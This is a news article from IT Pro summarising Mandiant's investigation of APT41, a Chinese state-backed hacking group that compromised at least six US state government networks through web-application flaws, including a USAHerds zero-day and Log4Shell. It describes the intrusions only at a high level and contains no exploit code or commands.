IT Pro is supported by its audience. When you purchase through links on our site, we may earn an affiliate commission. Learn more

China-backed hackers compromised six US government networks

Mandiant researchers investigated APT41 activities between May 2021 and February 2022

Chinese hackers belonging to the state-backed APT41 group compromised at least six US government networks by exploiting vulnerabilities in internet-facing applications. 

The vulnerabilities included a zero-day in the USAHerds application and the Log4Shell flaw in the ubiquitous Java logger Log4j, according to cyber security firm Mandiant, which was this week acquired by Google. The company responded to an APT41 intrusion targeting a US state government computer network in May 2021 and studied the group's activity until February 2022.

APT41 is a prolific Chinese state-sponsored espionage group known to for targeting organisations in both the public and private sectors and for conducting financially motivated activity for personal gain.

Although the goals of APT41’s latest campaign remain unknown, Mandiant’s investigations revealed a variety of new techniques and malware variants used by the hackers.

During the period of investigation, Mandiant found that APT41 successfully compromised at least six US state government networks through the exploitation of vulnerable internet-facing web applications, often written in ASP .NET. In most of the compromises, APT41 carried out .NET deserialization attacks, although Mandiant also observed the group exploiting SQL injection and directory traversal vulnerabilities.

In one instance, APT41 gained access through an SQL injection vulnerability in a proprietary web application but Mandiant detected and contained the activity. However, two weeks later, APT41 re-compromised the network by exploiting a previously unknown zero-day vulnerability in a commercial-off-the-shelf (CoTS) application, USAHerds.

In two other instances, Mandiant began an investigation at one state agency only to find that APT41 had also compromised a separate, unrelated agency in the same state.

Mandiant added that the hacking group was quick to adapt and use publicly disclosed vulnerabilities to gain initial access into target networks, while also maintaining existing operations.

“On December 10th, 2021, the Apache Foundation released an advisory for a critical remote code execution (RCE) vulnerability in the commonly used logging framework Log4J,” wrote the researchers. “Within hours of the advisory, APT41 began exploiting the vulnerability to later compromise at least two US state governments as well as their more traditional targets in the insurance and telecommunications industries.”

Mandiant said that in late February 2022, APT41 re-compromised two previous US state government victims. This closely aligns with APT41’s May-December 2021 activity, representing a continuation of their campaign into 2022 and demonstrating their unceasing desire to access state government networks, said the company. 

Mandiant underlined that the goals of the campaign are currently unknown, although it has observed evidence of APT41 exfiltrating Personal Identifiable Information (PII).

“Although the victimology and targeting of PII data is consistent with an espionage operation, Mandiant cannot make a definitive assessment at this time given APT41’s history of moonlighting for personal financial gain,” stated the researchers.

Members of APT41 were charged by the US Department of Justice (DoJ) in September 2020 in connection with computer intrusion campaigns against over 100 victim companies.

The DoJ said their intrusion facilitated the theft of source code, software code signing certificates, customer account data, and valuable business information. It added these intrusions facilitated the defendants’ other criminal schemes, like ransomware or crypto-jacking schemes.

Featured Resources

Activation playbook: Deliver data that powers impactful, game-changing campaigns

Bringing together data and technology to drive better business outcomes

Free Download

In unpredictable times, a data strategy is key

Data processes are crucial to guide decisions and drive business growth

Free Download

Achieving resiliency with Everything-as-a-Service (XAAS)

Transforming the enterprise IT landscape

Free Download

What is contextual analytics?

Creating more customer value in HR software applications

Free Download

Recommended

India to roll out 6G by end of decade
Network & Internet

India to roll out 6G by end of decade

18 May 2022
Data centres that switch from HDDs to SSDs use 70% less power
data centres

Data centres that switch from HDDs to SSDs use 70% less power

16 May 2022
IT admin deletes company’s databases and is jailed for seven years
Policy & legislation

IT admin deletes company’s databases and is jailed for seven years

16 May 2022
Australia pledges $5 million to create tech skills passport
Careers & training

Australia pledges $5 million to create tech skills passport

11 May 2022

Most Popular

16 ways to speed up your laptop
Laptops

16 ways to speed up your laptop

13 May 2022
Preparing for the 3G sunset
Network & Internet

Preparing for the 3G sunset

18 May 2022
(ISC)2 launches free scheme to get 100,000 UK citizens into cyber security
Careers & training

(ISC)2 launches free scheme to get 100,000 UK citizens into cyber security

17 May 2022